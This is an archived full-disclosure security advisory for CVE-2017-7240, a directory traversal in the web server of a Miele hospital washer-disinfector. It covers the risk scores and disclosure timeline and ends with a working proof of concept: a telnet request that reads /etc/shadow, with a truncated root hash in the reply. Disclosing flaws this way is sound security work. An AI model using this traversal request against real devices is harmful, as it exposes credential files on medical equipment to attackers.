[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CVE-2017-7240] Miele Professional PG 8528 - Web Server Directory Traversal
From: Jens Regel <jregel () schneider-wulf ! de>
Date: 2017-03-24 7:27:26
Message-ID: 1704c2d8-bf3a-c618-4eba-064ee03751df () schneider-wulf ! de
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
Title:
======
Miele Professional PG 8528 - Web Server Directory Traversal
Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2017-7240
Risk Information:
=================
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
CVSS Temporal Score: 3.9
Timeline:
=========
2016-11-16 Vulnerability discovered
2016-11-10 Asked for security contact
2016-11-21 Contact with Miele product representative
2016-12-03 Send details to the Miele product representative
2017-01-19 Asked for update, no response
2017-02-03 Asked for update, no response
2017-03-23 Public disclosure
Status:
=======
Published
Affected Products:
==================
Miele Professional PG 8528 (washer-disinfector) with ethernet interface.
Vendor Homepage:
================
https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528
Details:
========
The corresponding embeded webserver "PST10 WebServer" typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.
Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1
HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52
root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::
Fix:
====
We are not aware of an actual fix.
["0xC0AA1B6C.asc" (application/pgp-keys)]
["signature.asc" (signature.asc)]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJY1MpfAAoJEJ/P8dLAqhts+N0QANKloV81sOhwxCeRUu83Fpq7
dSgld+DTE8aeKqfvDfVaWai3f4oCc7iKrqMG2WC346MqT0oiBJvu+m0hgR0ySw/g
/SvTytdo8wyt+3tMmlVcf6JvM/gZR1fG5lqXHibju87aHp9GRYl53+iXSpbss6Ao
15A9WLUaki0046maakdGv7F4+nEDCyXssnSNo8Y1qh7erpw/QOU36xtOU099mrJz
rMW11G4YXSGhTP9buY2JGneNA20mydBwQ7mkax0tLP1ZPsbjisgECb8C3lmYcaRJ
gN+4aDuRb7cAWS1DACFQRJZh//7qtZ2i54NQZOM4ZGokF0LcVrUS/I4ZhxHH3Kfk
u1HwzGdJaG1UQ6PI2KJyFPy7qRCO8N09YFr6JsLYO7srNeg2ngzKI+jEkfmwUJDO
pomR79b/diUp2urOUv5munXgs+0dDpoO8Mh9ryTduc7Q5BmYzXbC8f4lkr+H6NcV
zim70FtsiER4srJCruvmUpGlG8QGtPhRiVRC4ibo8EdWOSeInkFZZzatQDje+7L+
gyjftZBof4ErbsQQERvwBDnhOfptfyvO9oB5utbnsUajeb9OhRb2GYzTbY/j0/Zc
r/lCesWPfRXRXU/x4wVJRFUFqqCABaT7CNb/1/xLZCgrK7xHvdgnSrRdq1+Ed27B
ngMj31OUzFhRCmm+cEI+
=bykJ
-----END PGP SIGNATURE-----
--mCPuBi7RAO7lr9np6oWqLOdoWCACDvRvb--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic